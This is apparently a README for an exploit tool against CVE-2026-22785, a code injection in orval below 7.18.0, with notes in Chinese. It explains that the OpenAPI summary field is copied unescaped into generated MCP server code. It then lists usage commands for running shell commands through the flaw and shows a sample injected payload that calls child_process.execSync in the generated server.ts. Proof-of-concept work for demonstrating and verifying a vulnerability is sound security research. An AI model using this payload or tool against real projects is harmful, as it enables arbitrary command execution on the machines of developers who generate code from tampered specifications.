
Exploit tool for CVE-2026-22785, a critical code injection in orval < 7.18.0. Provides shell command execution and file scanning to demonstrate the vulnerability and verify payload injection.
orval < 7.18.0 在生成 MCP 服务器代码时,将 OpenAPI 规范的 summary 字段直接拼接到模板中,未进行转义,导致代码注入。
cd exploit
npm install
# 执行命令(漏洞利用)
python cve_tool.py shell <命令>
# 示例
python cve_tool.py shell whoami
python cve_tool.py shell "node --version"
python cve_tool.py shell dir
# 扫描文件
python cve_tool.py scan <文件>
<命令输出>
[+] CVE-2026-22785: Payload 注入成功
[+] 注入位置: server.ts:31
server.ts 生成代码:
server.tool(
'getApiDemo',
'API.' + require('child_process').execSync('whoami', {}),//',
getApiDemoHandler
);